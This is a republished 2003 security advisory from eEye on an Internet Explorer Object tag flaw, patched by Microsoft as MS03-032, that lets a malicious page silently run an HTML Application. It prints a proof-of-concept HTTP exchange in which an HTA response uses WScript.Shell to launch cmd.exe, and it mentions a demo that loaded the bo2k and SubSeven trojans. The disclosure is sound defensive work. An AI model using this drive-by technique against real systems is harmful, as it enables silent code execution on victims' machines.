|
Brought to you by:
Suppliers of:
|
|
|
| |
eEye Digital Security has discovered a security vulnerability in Microsoft's Internet Explorer that would allow executable code to run automatically upon rendering malicious HTML.
This is a flaw in Microsoft's primary contribution to HTML, the Object tag, which is used to embed all ActiveX into HTML pages. The parameter that specifies the remote location of data for objects is not checked to validate the nature of the file being loaded, and therefore Trojan executables may be run from within a webpage as silently and as easily as Internet Explorer parses image files or any other "safe" HTML content.
This attack may be utilized wherever IE parses HTML, including web sites, e-mail, newsgroups, and within applications utilizing web-browsing functionality. |
| |
Credit:
The information has been provided by Drew Copley of eEye.
|
| |
Vulnerable systems:
* Microsoft Internet Explorer 5.01
* Microsoft Internet Explorer 5.5
* Microsoft Internet Explorer 6.0
* Microsoft Internet Explorer 6.0 for Windows Server 2003
Technical Description:
--------------Client HTTP request---------------------------
< html>
...
< object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
------------------------------------------------------------
-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191
< html>
< object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
< script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS"); </script> </html>
------------------------------------------------------------
This example is in the more traditional vein. In house, we set up a demonstration system that silently loaded "bo2k" and "subseven" Trojans from within a single webpage.
The above example shows an entirely legitimate session. The only trick to this is that the "Data" URL must not end in an unsafe extension (e.g., ".exe", ".bat", etc). The "Content-Type" tag returned by the server is treated by Internet Explorer as authoritative.
In other words, the client asks for a safe file, the server returns an unsafe file, and Internet Explorer does not know what hit it.
What Internet Explorer should be doing in this case is not loading the unsafe document at all, or it should prompt the user with a severe warning about this file, with the default option being to save the file to disk.
We can generally guess what is going on here. As .hta or "HTML Application" files are not binary and resemble - mechanically - HTML files, IE's check of content will be unable to return that this file is anything but safe. The second check of MIME type will see that we are requesting a safe file type... and the third check of MIME type will be from the server saying this is a HTML Application. For whatever reason, IE has ignored the returned MIME type from a security context, but paid attention to it from an execution context.
This attack was discovered through manual testing techniques. The hypothesis
was: "Internet Explorer has many avenues where it might be presented with executable content. One of these avenues must be broken so that executable content might be automatically run."
Vendor Status:
Microsoft was notified and has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/security/bulletin/MS03-032.asp.
|
|
|
|
|
